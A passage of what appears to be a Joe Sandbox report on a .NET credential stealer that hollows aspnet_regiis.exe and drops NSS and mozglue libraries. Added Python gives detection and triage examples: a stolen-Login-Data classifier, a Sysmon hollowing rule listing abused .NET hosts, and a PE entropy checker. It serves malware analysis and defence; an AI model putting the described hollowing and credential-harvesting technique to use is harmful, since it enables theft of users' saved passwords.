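        return fh.read(16) == SQLITE_MAGIC


def open_readonly(path: str) -> sqlite3.Connection:
    """Open as immutable and read-only so triage cannot write journals into evidence."""
    uri = Path(path).resolve().as_uri() + "?mode=ro&immutable=1"
    return sqlite3.connect(uri, uri=True)


def classify_dropped_file(path: str) -> dict:
    """Say whether the file is SQLite and, per credential table, how many rows it holds."""
    if not is_sqlite(path):
        return {"sqlite": False, "tables": [], "credential_rows": {}}
    con = open_readonly(path)
    try:
        tables = [row[0] for row in con.execute("SELECT name FROM sqlite_master WHERE type='table'")]
        credential_rows = {
            # t is restricted to the fixed allow-list above, so quoting it here is safe
            t: con.execute(f'SELECT COUNT(*) FROM "{t}"').fetchone()[0]
            for t in tables if t in CREDENTIAL_TABLES
        }
    finally:
        con.close()
    return {"sqlite": True, "tables": sorted(tables), "credential_rows": credential_rows}


def build_sample_login_data(directory: str) -> str:
    """Constructed stand-in for a copied Login Data file (not the report's dropped file).
    The logins table is reduced to the few columns needed to hold one row."""
    path = os.path.join(directory, "CBKJEG")    # named like the six-letter dropped files in this report
    con = sqlite3.connect(path)
    with con:
        con.execute("CREATE TABLE logins (id INTEGER PRIMARY KEY, origin_url VARCHAR NOT NULL, "
                    "username_value VARCHAR, password_value BLOB)")
        con.execute(PASSWORD_NOTES_DDL)
        # opaque constructed blob standing in for an encrypted password value
        con.execute("INSERT INTO logins VALUES (1, 'https://example.test/login', 'alice', X'763130deadbeef')")
    con.close()
    return path


def run_demo() -> dict:
    """Classify one constructed Login Data copy and one non-database file."""
    with tempfile.TemporaryDirectory() as d:
        login_data = build_sample_login_data(d)
        junk = os.path.join(d, "JJKFBA")
        with open(junk, "wb") as fh:
            fh.write(b"\0" * 64)
        return {"CBKJEG": classify_dropped_file(login_data), "JJKFBA": classify_dropped_file(junk)}


if __name__ == "__main__":
    for name, verdict in run_demo().items():
        print(name, verdict)
```

The row counts are what matter for scoping: the number of rows in logins is the number of saved credentials the thief obtained from that profile, and the same classification can be run over every file the sample created, not only the two named in the report.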
Source: file.exe Virustotal: Detection: 30%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" Jump to behavior
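The process tree above is the pivot of this sample: file.exe, itself a .NET assembly (it loads mscoree.dll and carries a COM descriptor directory), starts the signed .NET Framework tool aspnet_regiis.exe with no switches, and the foreign-memory allocation and write signatures in this report show that the idle child is then overwritten with the stealer. A legitimate aspnet_regiis.exe run comes from an installer or an administrator's shell and carries switches such as -i, -iru or -pe. The Python below is an added detection example, not part of the Joe Sandbox report, that applies exactly those two tests to process-creation records. The event records are constructed to mirror the tree above, the benign contrast event is invented, and the extension of the rule to aspnet_regiis.exe's sibling utilities is an assumption of the example.

```python
"""Flag process-creation events in which a .NET Framework utility is started
the way this report shows: by a user-dropped executable, with no switches."""
import ntpath
from dataclasses import dataclass

# Utilities from the .NET Framework directory that stealers start idle and then
# overwrite in memory. Assumption: generalised from the aspnet_regiis.exe in
# this report to its usual siblings; trim or extend for your estate.
HOLLOW_HOSTS = {
    "aspnet_regiis.exe", "aspnet_compiler.exe", "regasm.exe",
    "regsvcs.exe", "installutil.exe", "msbuild.exe",
}

# A real ASP.NET registration is started by an installer or an admin shell,
# never by something living under a user profile, ProgramData or a temp directory.
USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\")


@dataclass
class ProcEvent:
    """The subset of a Sysmon Event ID 1 record the rule needs."""
    image: str
    command_line: str
    parent_image: str


def args_after_image(command_line: str) -> str:
    """Return whatever follows the (possibly quoted) image path on the command line."""
    cl = command_line.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        return cl[end + 1:].strip() if end != -1 else ""
    parts = cl.split(None, 1)
    return parts[1].strip() if len(parts) == 2 else ""


def assess(ev: ProcEvent) -> list[str]:
    """Reasons this event looks like a hollowed .NET host; an empty list means no finding."""
    reasons: list[str] = []
    image = ntpath.basename(ev.image).lower()
    if image not in HOLLOW_HOSTS:
        return reasons
    if not args_after_image(ev.command_line):
        reasons.append(f"{image} started without switches (legitimate runs pass e.g. -i, -iru or -pe)")
    parent = ev.parent_image.lower()
    if any(marker in parent for marker in USER_WRITABLE_MARKERS):
        reasons.append(f"parent {ev.parent_image} runs from a user-writable location")
    return reasons


# Constructed events. The first mirrors the process tree in this report; the
# second is a benign installer run invented for contrast.
REPORT_EVENT = ProcEvent(
    image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe",
    command_line=r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"',
    parent_image=r"C:\Users\user\Desktop\file.exe",
)
BENIGN_EVENT = ProcEvent(
    image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe",
    command_line=r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru',
    parent_image=r"C:\Windows\System32\msiexec.exe",
)

if __name__ == "__main__":
    for ev in (REPORT_EVENT, BENIGN_EVENT):
        print(ev.parent_image, "->", ev.image)
        for reason in assess(ev) or ["no finding"]:
            print("   ", reason)
```

The two tests are deliberately independent: the empty command line alone is enough to look at, and the parent location alone catches a dropper that bothers to pass a fake switch. Pair the rule with Sysmon Event ID 8 or 10 (remote thread, process access) from the same parent to confirm the injection the report describes.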
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2672994085.000000003A0B1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2668214599.000000002E1D7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.be0000.0.unpack JO_E58:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A18950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_02A18950
Source: file.exe Static PE information: section name: JO_E58
Source: file.exe Static PE information: section name:
Source: mozglue.dll.3.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr Static PE information: section name: .didat
Source: softokn3.dll.3.dr Static PE information: section name: .00cfg
Source: nss3.dll.3.dr Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C342CD push esp; ret 0_2_00C34316
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C340DE pushfd ; ret 0_2_00C340E2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C31EAB push esp; iretd 0_2_00C31EFF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5DA421 push ecx; ret 0_2_6D5DA434
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A2F142 push ecx; ret 3_2_02A2F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A1DDB5 push ecx; ret 3_2_02A1DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A22D3B push esi; ret 3_2_02A22D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CA9B536 push ecx; ret 3_2_6CA9B549
Source: file.exe Static PE information: section name: JO_E58 entropy: 7.9994803282182785
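Three of the static findings in this block describe the same packer from different angles: file.exe carries a section named JO_E58 whose entropy of 7.9995 is essentially the 8.0 ceiling of random data, a second section with no name at all, and a section-rights comparison showing the image mapped with an executable-and-writable section before and after unpacking. The Python below is an added example, not from the Joe Sandbox report, that reproduces those three checks with nothing but struct: it walks the section table of a PE and reports nameless sections, writable-and-executable sections and high-entropy raw data. The 7.0 threshold is a common triage value and an assumption here, and the two-section PE it triages is constructed, not the sample.

```python
"""Static triage of a PE section table: nameless sections, sections that are
both writable and executable, and near-8-bit entropy."""
import math
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PACKED_ENTROPY = 7.0   # assumption: a common triage threshold, not a value from the report


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniformly distributed one."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return max(0.0, -sum(c / n * math.log2(c / n) for c in counts if c))


def rights(characteristics: int) -> str:
    """Render section rights the way the report does (E, W, R)."""
    return ("E" if characteristics & IMAGE_SCN_MEM_EXECUTE else "") + (
        "W" if characteristics & IMAGE_SCN_MEM_WRITE else "") + (
        "R" if characteristics & IMAGE_SCN_MEM_READ else "")


def triage_sections(pe: bytes) -> list[dict]:
    """Walk the IMAGE_SECTION_HEADER table and return one finding per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (num_sections,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_hdr_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_hdr_size          # first section header follows the optional header
    findings = []
    for i in range(num_sections):
        name_raw, _vsize, _vaddr, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)
        name = name_raw.rstrip(b"\0").decode("latin-1")
        entropy = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
        flags = []
        if not name:
            flags.append("nameless section")
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            flags.append("writable and executable")
        if raw_size and entropy >= PACKED_ENTROPY:
            flags.append(f"entropy {entropy:.4f} (compressed or encrypted payload)")
        findings.append({"name": name, "rights": rights(chars),
                         "entropy": round(entropy, 4), "flags": flags})
    return findings


def build_sample_pe() -> bytes:
    """Constructed test image, not the report's file.exe: a PE32 whose first
    section is nameless, EWR and filled with uniformly distributed bytes, and
    whose second section is an ordinary read/execute .text full of NOPs."""
    sections = [
        (b"", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ, bytes(range(256)) * 16),
        (b".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, b"\x90" * 4096),
    ]
    opt_hdr_size = 224                             # size of a PE32 optional header
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_hdr_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_hdr_size - 2)     # PE32 magic, rest zeroed
    raw_ptr = len(dos) + 4 + len(coff) + len(opt) + 40 * len(sections)
    table, blobs = b"", b""
    for name, chars, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), raw_ptr,
                             len(data), raw_ptr, 0, 0, 0, 0, chars)
        blobs += data
        raw_ptr += len(data)
    return dos + b"PE\0\0" + coff + opt + table + blobs


if __name__ == "__main__":
    for s in triage_sections(build_sample_pe()):
        print(f"{s['name'] or '<nameless>':10} {s['rights']:4} {s['entropy']:.4f}  {', '.join(s['flags'])}")
```

Run against a real file, triage_sections(open(path, "rb").read()) gives the same name/rights/entropy view the report prints, and a section that trips all three flags at once is the packed payload to dump from memory rather than unpack statically.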
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\msvcp110.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
